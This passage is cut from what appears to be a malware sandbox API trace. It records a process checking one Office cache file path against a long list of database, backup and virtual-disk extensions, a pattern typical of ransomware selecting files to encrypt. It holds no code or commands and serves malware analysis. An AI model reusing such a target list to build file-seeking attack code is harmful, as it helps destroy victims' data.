(lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ade") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".adf") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".adp") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".arc") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ora") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".alf") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ask") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".btr") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".bdf") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".cat") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".cdb") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ckp") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".cma") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".cpd") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dacpac") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dad") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dadiagrams") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".daschema") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".db") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".db-shm") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".db-wal") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".db3") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dbc") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dbf") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dbs") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dbt") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dbv") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dbx") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dcb") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dct") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dcx") returned 0x0 [0161.372] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ddl") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dlis") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dp1") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dqy") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dsk") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dsn") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dtsx") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".dxl") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".eco") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ecx") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".edb") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".epim") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".exb") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fcd") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fdb") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fic") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fmp") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fmp12") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fmpsl") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fol") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fp3") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fp4") returned 0x0 [0161.373] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fp5") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fp7") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fpt") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".frm") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".gdb") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".grdb") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".gwi") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".hdb") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".his") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ib") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".idb") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ihx") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".itdb") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".itw") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".jet") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".jtx") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".kdb") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".kexi") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".kexic") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".kexis") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".lgc") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".lwx") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".maf") returned 0x0 [0161.374] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".maq") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mar") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mas") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mav") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mdb") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mdf") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mpd") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mrg") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mud") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mwb") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".myd") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ndf") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nnt") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nrmlib") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ns2") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ns3") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".ns4") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nsf") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nv") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nv2") returned 0x0 [0161.375] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nwdb") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nyf") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".odb") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".oqy") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".orx") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".owc") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".p96") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".p97") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".pan") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".pdb") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".pdm") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".pnz") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".qry") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".qvd") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".rbf") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".rctd") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".rod") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".rodx") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".rpd") returned 0x0 [0161.376] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".rsd") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sas7bdat") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sbf") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".scx") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sdb") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sdc") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sdf") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sis") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".spq") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sql") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sqlite") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sqlite3") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".sqlitedb") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".te") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".temx") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".tmd") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".tps") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".trc") returned 0x0 [0161.377] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".trm") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".udb") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".udl") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".usr") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".v12") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vis") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vpd") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vvv") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".wdb") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".wmdb") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".wrk") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".xdb") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".xld") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".xmlff") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".abcddb") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".abs") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".abx") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".accdw") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".adn") returned 0x0 [0161.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".db2") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".fm5") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".hjt") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".icg") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".icr") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".kdb") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".lut") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".maw") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mdn") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".mdt") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vdi") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vhd") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vmdk") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All 